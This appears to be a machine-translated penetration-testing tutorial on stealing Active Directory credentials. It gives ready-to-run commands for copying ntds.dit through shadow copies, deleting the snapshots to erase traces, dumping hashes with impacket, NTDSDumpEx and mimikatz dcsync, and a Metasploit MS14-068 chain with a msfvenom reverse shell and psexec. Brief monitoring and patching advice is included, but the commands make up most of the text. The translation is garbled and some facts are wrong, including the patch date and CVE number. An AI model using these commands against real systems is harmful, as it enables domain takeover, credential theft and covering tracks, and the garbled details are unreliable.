1. Use shadow copy services ntds.dit

Method ：

• adopt ntdsutil.exe extract ntds.dit
• utilize vssadmin extract ntds.dit
• utilize vssown.vbs Script extraction ntds.dit
• Use ntdsutil Of iFM Create shadow copies
• Use diskshadow export ntds.dit

adopt ntdsutil.exe extract ntds.dit

In general , Even with administrator rights , Cannot read from the domain controller ndts.dit file , But we really want to get the contents of this file , You need to use windows Local Shadow Copy Service VSS. In the active directory , All the data is stored in ntds.dit In file ,ntds.dit It's a binary file , Include user name 、 Hash value 、 Group 、GPP、OU And other information related to the active directory , It and SAM file , By windows System locked . Volume shadow copy service VSS, It is essentially a kind of snapshot technology , Mainly used for backup and recovery , Even if the file is currently locked .

 ntdsutils.exe Is a command line tool that provides a management mechanism for the active directory , Use ntdsutils.exe You can maintain and manage the active directory database 、 Control the operation of a single host 、 Create application directory partition, etc , The tool is installed on the domain control server by default , You can operate directly on the domain controller , Support windows server 2003、2008、2012. The extraction process is divided into 3 Step ：

First step ： Create a snapshot

ntdsutil.exe snapshot "activate instance ntds" create q q

  The resulting snapshot GUID by ：

{850bc5ab-7620-48fa-bd1f-c23c8150a3f0}

The second step ： Load snapshot  

Snapshot location ：C:\$SNAP_202009222211_VOLUMEC$\

ntdsutil.exe snapshot "mount {850bc5ab-7620-48fa-bd1f-c23c8150a3f0}" q q

We need to destroy the traces , So delete the snapshot , There are also three steps to calm your heart ：

First step ： see  

ntdsutil.exe snapshot "List All" q q

The second step ： The destruction  

ntdsutil.exe snapshot "umount {850bc5ab-7620-48fa-bd1f-c23c8150a3f0}" "delete {850bc5ab-7620-48fa-bd1f-c23c8150a3f0}" q q

  The third step ： Check it again （ Confirm that all are deleted successfully ）

2. export ntds.dit Hash value in

• Use impacket The toolkit exports hash values （Linux）
• Use NTDS Dumpex Export hash value （Windows）

But before we start , We need to do some preparatory work , One is ntds.dit Active directory file , The other is system.save file , Can pass HiveJack This gadget is easy to get ,github Can be downloaded from .

Got it system.save file 、ntds.dit Active directory file , You can go through Impacket Easy access ntds.dit All hash hashes sealed in the active directory file .

impacket-secretsdump -system system.save -ntds ntds.dit LOCAL

If in windows Next , Can pass NTDS Dumpex Perform the operation of exporting hash values , What is needed is still system.save file 、ntds.dit Active directory file .

NTDSDumpEx download

.\NTDSDumpEx.exe -d .\ntds.dit -s .\system.save

impacket install ：

windows install , Enter the folder directory and enter 
python3 -m pip install .        
python3 setup.py install

kali Install in ：
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python3 -m pip install .  
python3 setup.py install

3. Monitor volume shadow copy service usage

• By monitoring the usage of volume shadow copy services , It can discover some malicious operations of the attacker in the system in time .
• Monitor the volume shadow copy service and any active directory database files involved (ntds.dit) Suspicious operation behavior .
• monitor System Event ID 7036( The flag that the volume shadow copy service enters the running state ) Suspicious instances of , And how to create vssvc.exe Process events .
• Monitoring creates dkshndko.exe And related child processes .
• Monitor the data in the client device diskshadow.exe Instance creation event . Unless the business needs , stay Windows Should not appear in the operating system diskshadow.exe. If you find that , It should be deleted immediately .
• Monitor emerging logical drive mapping events through logs .

4. utilize dcsync Get the domain hash value

Use mimikatz Dump domain hash values

mimikatz There is one dcsync function , You can use Volume shadow copy service Direct reading ntds.dit File and retrieve the domain hash value . It should be noted that , You have to use Domain administrator privileges function mimikatz Before it can be read ntds.dit.
On any computer in the domain , Open the command line environment with domain administrator privileges , function mimikatz. Enter the following command , Use mimikatz Export all user names and hash values in the domain , Pictured 6-34 Shown .

lsadump::dcsync /domain:pentest.com /all /csv

 You can also run directly in the domain controller mimikatz, By dump Isass.exe The process changes the hash value Dump operation 
privilege::debug
lsadump::lsa /inject

5.Kerberos Analysis and prevention of domain user privilege raising vulnerability

Microsoft is in 2014 year 1 month 18 An emergency supplement was issued on the th , Repair the Kerhers The right of urban users is leaked (MS14-068 CVE201462424) all Windwos The server operating system will be affected by this vulnerability , Include WindowsServer2003、Windows Server 208 Windows Sever 2008 R2、Windows Server 2012 and Win2012R2. This vulnerability can affect the overall permission control of the active directory , Allows an attacker to elevate the privileges of any user in the city to the domain management level . informally , If the attacker Got the information of any computer in the city Shell jurisdiction , At the same time, know the user name of any domain user 、SID、 password , You can obtain the permission of city administrator , Then control the domain controller , Finally get domain permissions .
The cause of this vulnerability is : The user is asking Kerberos Miming Distribution Center ( KDC) apply TGT Identity documents generated by the ticket authorization service ) when , You can forge your own Kerberos Notes . If the ticket declares that it has domain administrator privileges , The signature of the bill is not verified when the bill is processed , Then return to the user TGT Let the common domain manage user permissions . The user can put TGT Send to KDC, KDC Of TGS ( Bill authorization service ) In the verification of TGT after , Service ticket (Service Ticket) Send to the user , The user has access to any of the services , This allows attackers to access resources within the domain .
 

msf Attack process

1. stay Metasploit To test 
    use auxiliary/admin/kerberos/ms14_068_kerberos_checksum 
    
	 Set parameters 
	DOMAIN: domain name .
	PASSWORD: Password of the authorized user .
	USER: The user who has been authorized .
	USER_SID: Of the authorized user SID.

    exploit

 Fill in all the information , Input “exploit” command , Will be in /rootl.msf4/loot Generate files under directory 20180715230259_default_172.16.86.130_windows.kerberos_839172.bin, Pictured 6-59 Shown .


2. format conversion 
    msf Import is not supported bin file . Use mimikatz Format conversion 
    kerberos::clist ".......bin" /export

3.msfvenom Generate a reverse shell

	msfvenom -p /windows/meterpreter/reverse_tcp LHOST=1.1.1.5 LPORT=7777 -f exe > shell.exe

4.msf Set listening 
	use exploit/multi/reverse_tcp
	exploit
5.
    getuid     View permissions 
    load kiwi 
    kerberos_ticket_use/tmp/...kirbi    # Import bill 
    background
    
6. Test with high authority tickets 
    use exploit/windows/local/current_user_psexec 
    set payload windows/meterpreter/reverse_tcp
    set TECHNIQUE PSH
    set RHOSTS win2008.hello.com
    set lhost 1.1.1.5
    set session 1
    exploit

Precautions

1.     Turn on Windows Update function , Make automatic updates .
2.     Manually download the patch package for repair . Microsoft has released a patch to fix this vulnerability
3.     Control the account in the domain , The use of weak passwords is prohibited , In time 、 Change your password regularly .
4.     Install anti-virus software on the server , Update virus database in time .